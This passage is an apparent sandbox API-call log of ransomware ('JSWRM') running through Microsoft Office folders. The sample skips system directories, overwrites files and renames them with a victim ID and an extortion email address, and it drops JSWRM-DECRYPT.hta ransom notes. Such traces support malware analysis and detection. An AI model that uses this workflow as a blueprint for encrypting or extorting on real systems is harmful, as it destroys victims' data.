lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa9b8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSO.ACL", cAlternateFileName="")) returned 1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2=".") returned 1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="..") returned 1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="...") returned 1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="windows") returned -1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="recovery") returned -1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="perflogs") returned -1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="documents and settings") returned 1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="$RECYCLE.BIN") returned 1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="system volume information") returned -1 [0122.777] lstrcmpiW (lpString1="MSO.ACL", lpString2="msocache") returned -1 [0122.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0122.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO.ACL", lpUsedDefaultChar=0x0) returned 7 [0122.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0122.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO.ACL", lpUsedDefaultChar=0x0) returned 7 [0122.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0122.777] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0122.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.777] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0122.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1036\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.778] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=43448) returned 1 [0122.778] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.778] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa9b0) returned 0x24e1d8 [0122.778] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xa9b0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xa9b0, lpOverlapped=0x0) returned 1 [0122.782] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.782] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xa9b0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xa9b0, lpOverlapped=0x0) returned 1 [0122.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.783] CloseHandle (hObject=0x238) returned 1 [0122.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0122.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0122.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0122.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.784] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1036\\mso.acl"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1036\\MSO.ACL.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1036\\mso.acl.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0122.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0122.784] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa9b8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSO.ACL", cAlternateFileName="")) returned 0 [0122.785] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0122.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0122.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0122.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0122.785] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4d440f9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="3082", cAlternateFileName="")) returned 1 [0122.785] lstrcmpiW (lpString1="3082", lpString2=".") returned 1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="..") returned 1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="...") returned 1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="windows") returned -1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="recovery") returned -1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="perflogs") returned -1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="documents and settings") returned -1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="$RECYCLE.BIN") returned 1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="system volume information") returned -1 [0122.785] lstrcmpiW (lpString1="3082", lpString2="msocache") returned -1 [0122.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0122.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0122.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0122.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b8f8 [0122.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0122.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\3082\\jswrm-decrypt.hta")) returned 0xffffffff [0122.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0122.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0122.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24e1d8 [0122.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0122.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0122.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b768 [0122.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0122.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\3082\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0122.787] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.787] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0122.788] CloseHandle (hObject=0x45c) returned 1 [0122.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0122.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.788] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0122.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0122.788] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0122.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0122.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0122.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b510 [0122.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0122.789] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\3082\\jswrm-decrypt.hta")) returned 0x20 [0122.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0122.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0122.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224cc8 [0122.789] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fd9472c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName=".", cAlternateFileName="")) returned 0x232240 [0122.789] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0122.789] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3fd9472c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="..", cAlternateFileName="")) returned 1 [0122.789] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0122.789] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0122.789] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fd9472c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x3fd9472c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x3fd9472c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0122.789] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0122.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.789] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.789] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.789] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0122.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0122.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0122.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0122.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224cc8 | out: hHeap=0x1e0000) returned 1 [0122.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0122.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.790] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xc4d440f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xc4d440f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xc4db6809, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xc57c, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSO.ACL", cAlternateFileName="")) returned 1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2=".") returned 1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="..") returned 1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="...") returned 1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="windows") returned -1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="recovery") returned -1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="perflogs") returned -1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="documents and settings") returned 1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="$RECYCLE.BIN") returned 1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="system volume information") returned -1 [0122.790] lstrcmpiW (lpString1="MSO.ACL", lpString2="msocache") returned -1 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x345ebd8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO.ACL", lpUsedDefaultChar=0x0) returned 7 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=7, lpMultiByteStr=0x345eba8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO.ACL", lpUsedDefaultChar=0x0) returned 7 [0122.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0122.790] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.790] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.790] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0122.790] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\3082\\mso.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.791] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=50556) returned 1 [0122.791] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.791] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc570) returned 0x24e1d8 [0122.791] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xc570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xc570, lpOverlapped=0x0) returned 1 [0122.802] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.802] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xc570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xc570, lpOverlapped=0x0) returned 1 [0122.802] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0122.803] CloseHandle (hObject=0x238) returned 1 [0122.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0122.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0122.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0122.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.804] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\3082\\MSO.ACL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\3082\\mso.acl"), 